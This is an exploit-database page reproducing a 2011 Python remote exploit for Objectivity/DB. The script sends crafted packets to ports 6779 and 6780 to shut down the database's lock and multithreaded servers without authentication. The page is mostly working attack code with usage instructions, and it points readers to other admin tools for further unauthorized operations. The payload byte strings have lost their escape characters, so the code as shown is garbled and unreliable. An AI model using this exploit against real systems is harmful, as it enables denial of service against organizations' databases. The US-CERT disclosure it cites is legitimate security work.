Objectivity/DB Lack of Authentication Remote Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Objectivity/DB Lack of Authentication Remote Exploit
# Published : 2011-01-14
# Author : Jeremy Brown
# Previous Title : Blackmoon FTP 3.1 Build 1735,1736 DOS
# Next Title : Wireshark ZigBee ZCL Dissector Infinite Loop Denial of Service

#!/usr/bin/python
# obj.py
# Objectivity/DB Lack of Authentication Remote Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# Jan 2011
#
# "Objectivity, Inc. is a leader in distributed, scalable database technology.
# Our patented data management engine and persistent object store is the enabling
# technology powering some of the most complex applications and mission critical
# systems used in government, business and science organizations today."
#
# Objectivity/DB includes many different tools for administration. The
# problem is, anyone can use these tools to perform operations on the host
# running the lock server, advanced multithreaded server, and probably
# it's other servers as well, without any authentication. This design flaw
# puts the host running these servers at risk of potentially unauthorized
# operations being performed on the system, locally or remotely.
#
# This code demostrates a couple of the easiest operations to replicate
# by hand, like killing the lock and am servers. The suite contains lots
# of other admin tools that do various, more interesting tasks with the
# Objectivity/DB, such as oobackup, oonewfd, oodeletefd, oodebug, etc...
#
# Tested on Objectivity/DB 10 running on Windows
#
# Fixed version: N/A, US-CERT coordinated the communication and released
# a vulnerability note after the vendor did not provide additional feedback.
#
# http://www.kb.cert.org/vuls/id/782567
#

import sys
import socket

kill_ooams=(
"x0dx03"+
"x00"*5+
"x02"+
"x00"*3+
"x19xf0x92xedx89xf4xe8x95x43x03"+
"x00"*15+
"x61x62x63"+
"x00"+
"x31x32x33x34"+
"x00"*3+
"x05x8c"+
"x00"*3+
"x0d"+
"x00"*4
)

kill_ools=(
"x0dx03"+
"x00"*5+
"x77"+
"x00"*3+
"x04xadxc4xaexdax9ex48xd6x44x03"+
"x00"*15
)

if len(sys.argv)<3:
     print "Objectivity/DB Remote Exploit"
     print "Usage: %s <target> <operation>"%sys.argv[0]
     print "nWhat would you like to do?n"
     print "[1] Kill the advanced multithreaded server"
     print "[2] Kill the lock server"
     print "For other operations, check out oobackup, oodebug, etc"
     sys.exit(0)

target=sys.argv[1]
op=int(sys.argv[2])

if((op<1)|(op>2)):
     print "Invalid operation"
     sys.exit(1)

if(op==1):
     port=6779
     data=kill_ooams

if(op==2):
     port=6780
     data=kill_ools

cs=target,port

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)

sock.send(data)

sock.close()